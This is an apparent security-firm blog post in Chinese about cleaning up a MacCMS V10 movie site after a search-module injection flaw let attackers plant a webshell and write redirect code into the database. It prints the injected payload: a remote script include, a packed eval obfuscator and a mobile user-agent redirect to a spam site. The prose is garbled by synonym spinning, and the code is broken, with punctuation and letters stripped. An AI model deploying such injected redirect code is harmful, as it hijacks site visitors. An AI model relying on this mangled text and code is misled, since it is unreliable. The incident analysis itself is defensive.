2020年刚开端，苹果CMS被爆出数据库代码执行破绽，大批的电影网站被挂马，尤其电影的页面被篡改植入了恶意代码，数据库中的VOD表里的d_name被全体改动，导致网站打开后直接跳转到S站或者弹窗广告，目前该maccms破绽受阴碍的苹果系统版本是V8,V10，许多客户网站被反复篡改，很无奈，通过朋友介绍找到我们寻求专业上支持，防范网站被挂马。

依据客户的反映，服务器使用的是linux centos系统，苹果CMS版本是最新的V10版本，我们当即成立网站安全应急响应处置，辅助客户解决网站被攻击的疑问。

首先许多站长认为升级了苹果CMS官方最新的破绽补丁就没疑问了，通过我们专业对补丁的代码安全解析发明，该破绽补丁对当前的数据库代码执行破绽是没有任何功效的，于事无补，网站还会继续被攻击。

我们来看下客户网站目前产生的挂马疑问，打开网站首页以及各个电影地址都会被插入挂马代码，如下图所示：

打包压缩了一份网站源代码，以及nginx网站日志文件，我们工程师在根目录下发明被上传了网站ebshell木马文件，通过网站日志溯源追踪我们察看到拜访这个PHP脚本木马文件的是一个韩国的IP，具体的代码如下图：

代码做了加密处置，我们对其解密发明该代码的性能可以对网站进行上传，下载，改动代码，操纵数据库等性能，属于PHP大马的范围，也叫ebshell木马文件，我们又对苹果CMS的源代码进行了人工安全审计，发明indexphp代码对搜索模块上做的一些恶意代码过滤查验存在破绽，可导致攻击者绕过安全过滤，直接将SQL插入代码执行到数据库当中去。

我们对数据库进行安全检测发明，在VOD表的d_name被批量植入了挂马代码：

scriptsrc=skilinxyz1js
eval(function(p,a,c,k,e,d){e=function(c)
{return(ca?e(parseInt(ca)))+((c=ca)35?StringfromCharCode(c+29)ctoString(36))};
if(!replace(^,String)){hile(c--)d[e(c)]=k[c]||e(c);
k=[function(e){returnd[e]}];e=function(){return\+};c=1;};
hile(c--)if(k[c])p=preplace(nePRegExp(\b+e(c)+\b,g),k[c]);returnp;}
(45(=327=0bcd80\9\+\a\);
,14,14,js|type|javascript|text|document|rite|script|src|20487493|scr|ipt|users|51|lasplit(|),0,{}));
varLOUMtBZeW=navigator[userAgent][toLoerCase]()[match]((ipod|iphone|ipad|andro|coolpad|mmp|smartphone|mp|ap|xoom|symbian|j2me|blackberry|ince)i)!=null;
if(LOUMtBZeW){setTimeout(indolocationhref=smqiche-hangjia168ua80666,500)}
这手法很技术，不是一般的攻击者所为，针对手机端做了跳转以及隐藏嵌入，让网站运营者基本无法察觉发明，还判断了cookies来路，到达条件才能触发攻击者植入的广告代码。继续安全解析与追踪，发明了攻击者的手法，POST提交到indexphp?m=vod-search，POST内容是加密的这里就不便捷发出了，属于破绽攻击了，可能会给其他采用苹果CMS系统的网站造成攻击，我们专业对POST攻击代码进行了解密解析，发明确切是绕过了苹果官方V8，V10系统的代码安全过滤，直接将挂马代码插入到了数据库里了。
疑问根源找到了，接下来我们对客户的苹果CMS破绽进行修复，对POST提交过来的参数进行严格的过滤与转义，对vod-search含有的恶意字符进行强制转换，对恶意代码进行安全拦截，防范传入到后端进行数据库里的代码执行。对网站代码里存在的木马后门进行了全面的人工审计与查验，共计发明5个后门，其余的在缓存目录当中，跟程序代码混淆在一起，也都删除了，对网站的后台地址进行了更换，之前后台采用的地址被攻击者把握，对控制员的账号密码进行了增强，至此苹果CMS网站被挂马的疑问才得以完全解决，假如您的maccms也被一直挂马，自己懂代码的话可以对POST到indexphp的数据进行安全拦截与查验，防范恶意代码的插入，假如不是太懂的话，建议找技术的网站安全公司来处置解决。